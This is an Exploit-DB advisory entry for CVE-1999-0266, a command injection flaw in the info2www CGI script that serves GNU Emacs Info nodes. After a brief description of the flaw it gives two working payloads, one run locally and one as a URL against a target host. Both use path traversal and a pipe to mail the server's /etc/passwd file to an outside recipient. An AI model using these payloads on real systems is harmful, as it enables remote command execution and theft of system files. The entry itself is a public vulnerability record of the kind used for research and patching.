Info2www 1.0/1.1 CGI Input Handling Vulnerability

ID EDB-ID:20430
Type exploitdb
Reporter Niall Smart
Modified 1998-03-03T00:00:00


Info2www 1.0/1.1 CGI Input Handling Vulnerability. CVE-1999-0266 . Remote exploit for cgi platform


The info2www script allows HTTP access to information stored in GNU EMACS Info Nodes. This script fails to properly parse input and can be used to execute commands on the server with permissions of the web server, by passing commands as part of a variable. Potential consequences of a successful exploitation involve anything the web server process has permissions to do, including possibly web site defacement. 

$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail recipient </etc/passwd|)'
You have new mail.

http://targethost/cgi-bin/info2www?(../../../../../../../../bin/mail recipient </etc/passwd|)